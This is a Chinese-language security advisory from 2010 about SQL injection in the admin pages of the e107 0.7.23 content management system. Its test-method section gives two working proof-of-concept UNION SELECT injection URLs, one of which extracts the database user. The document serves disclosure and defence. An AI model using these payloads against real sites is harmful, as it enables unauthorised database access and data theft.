发布日期：2010-09-20
更新日期：2010-09-21

受影响系统：

e107.org e107 0.7.23

描述：

---

e107是用php编写的内容管理系统。

e107没有正确地过滤用户通过HTTP GET请求提交给e107_admin/download.php和e107_admin/wmessage.php页面的请求参数，这可能导致SQL注入攻击。成功利用这些漏洞要求用户拥有Post download或Welcome message权限。

<*来源：High-Tech Bridge SA （http://www.htbridge.ch/）
  
  链接：http://secunia.com/advisories/41494/
        http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_e107_1.html
        http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_e107.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://host/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
http://host/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29

建议：

---

厂商补丁：

e107.org
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://e107.org/

浏览次数：3582
严重程度：0（网友投票）